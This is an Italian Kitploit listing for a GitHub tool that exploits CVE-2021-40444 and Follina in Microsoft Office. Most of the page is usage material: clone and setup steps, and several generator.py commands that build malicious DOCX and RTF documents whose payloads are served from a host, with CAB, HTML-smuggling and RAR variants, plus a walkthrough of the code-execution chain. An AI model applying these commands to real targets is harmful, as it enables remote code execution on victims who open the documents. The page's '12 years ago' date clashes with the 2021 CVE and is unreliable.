Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Follina-CVE-and-CVE-2021-40444 — Questo repository contiene script e risorse per sfruttare le vulnerabilità Follina CVE e CVE-2021-40444 in Microsoft Office. Gli script generano file di documenti dannosi che possono eseguire codice arbitrario sul sistema di destinazione. | Kitploit
Strumenti/GitHubGitHub/basim-ahmad/follina-cve-and-cve-2021-40444
Generazione di PayloadExploitSfruttamento di Applicazioni WebAnalisi MalwarePenetration TestingApprendimento e Formazione
GitHubbasim-ahmad/follina-cve-and-cve-2021-40444

Follina-CVE-and-CVE-2021-40444

Questo repository contiene script e risorse per sfruttare le vulnerabilità Follina CVE e CVE-2021-40444 in Microsoft Office. Gli script generano file di documenti dannosi che possono eseguire codice arbitrario sul sistema di destinazione.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Vedi Repository
12 anni faNon ancora revisionato
Condividi

Sfruttamento delle vulnerabilità Follina CVE e CVE-2021-40444

Indice

  1. Introduzione
  2. Prerequisiti
  3. Configurazione e installazione
  4. Utilizzo
  5. Spiegazione dettagliata
  6. Comandi
  7. Dichiarazione di esclusione di responsabilità

Introduzione

Questo repository contiene script e risorse per sfruttare le vulnerabilità Follina CVE e CVE-2021-40444 in Microsoft Office. Gli script generano file di documento dannosi in grado di eseguire codice arbitrario sul sistema di destinazione.

Prerequisiti

  • Flare VM
  • Python 3.x
  • Microsoft Word
  • Pacchetti Python richiesti (elencati in requirements.txt)

Configurazione e installazione

  1. Configurazione Flare VM:

  • Assicurati di avere Flare VM installato. Le credenziali per la VM sono:
    • Nome utente: lab
    • Password: password
  • Python e ambiente virtuale:

    root@kitploit:~
    git clone https://github.com/basim-ahmad/Follina-CVE-and-CVE-2021-40444.git
    cd CVE-2021-40444
    
    • Assicurati che Python e pip siano installati nella macchina virtuale.
    • Installa il pacchetto virtualenv usando il seguente comando:
      root@kitploit:~
      pip install virtualenv
      
    • Crea un ambiente virtuale chiamato venv:
      root@kitploit:~
      python -m virtualenv venv
      
    • Attiva l'ambiente virtuale:
      root@kitploit:~
      venv\Scripts\activate.bat
      
    • Installa i pacchetti richiesti:
      root@kitploit:~
      pip install -r requirements.txt
      
  • Utilizzo

    1. Generazione dell'exploit:

      • Naviga nella directory del progetto ed esegui il seguente comando per generare l'exploit:
        root@kitploit:~
        python generator.py -u http://192.168.197.132 -P test\calc.dll --host
        
        Sostituisci 192.168.197.132 con il tuo indirizzo IP.
    2. Accesso al documento generato:

      • Il file .docx generato si troverà nella directory:
        root@kitploit:~
        C:\Users\Lab\Desktop\project\CVE-2021-40444\out\document.docx
        

    Spiegazione dettagliata

    Sfruttamento a catena

    • Il documento (.docx) viene aperto.
    • Il documento contiene una relazione che punta a HTML dannoso memorizzato in document.xml.rels.
    • Il collegamento HTML si apre nell'anteprima di IE.
    • Un oggetto punta a un file CAB e a un iframe che punta a un file INF, entrambi incorporati in JScript e preceduti dalla direttiva ".cpl:".
    • Il file CAB si apre, salvando il file INF nella directory %TEMP%Low.
    • Il file INF viene aperto usando la direttiva ".cpl:", causando il side-load del file INF da parte di rundll32.

    Panoramica degli script

    generator.py

    • Implementa un exploit per CVE-2021-40444, consentendo l'esecuzione remota di codice tramite Microsoft Office.
    • Contiene diverse funzioni helper per la modifica dei file CAB, la creazione di file RAR, la generazione di payload e altro.

    cab_parser.py

    • Uno strumento per visualizzare le intestazioni dei file CAB.
    • Definisce classi e metodi per gestire e analizzare i file CAB.

    Sezione 2.0: Configurazione in Flare VM

    • Installa gli strumenti e i pacchetti necessari.
    • Crea e attiva un ambiente virtuale.
    • Installa i pacchetti Python da requirements.txt.

    Comandi

    • Genera l'exploit originale e testalo localmente:
      root@kitploit:~
      python generator.py -u http://127.0.0.1 -P test\calc.dll --host
      
    • Genera exploit senza CAB che sfrutta MS-MSDT (attacco Follina), in documenti DOCX e RTF:
      root@kitploit:~
      python generator.py -u http://127.0.0.1 -P test\calc.ps1 --no-cab --host --convert
      
    • Genera exploit senza CAB (solo IE) con contrabbando HTML e testalo localmente tramite IE:
      root@kitploit:~
      python generator.py -u http://127.0.0.1 -P test\calc.js --no-cab --host -t
      
    • Genera exploit senza CAB con RAR e testalo localmente tramite IE:
      root@kitploit:~
      python generator.py -u http://127.0.0.1 -P test\job-jscript.wsf --no-cab --host -t
      

    Dichiarazione di esclusione di responsabilità

    Questo progetto è solo a scopo educativo. Usalo responsabilmente e non sfruttare vulnerabilità su sistemi per i quali non hai il permesso di testare. Un uso improprio di queste informazioni può portare a accuse penali.

    Scarica lo strumento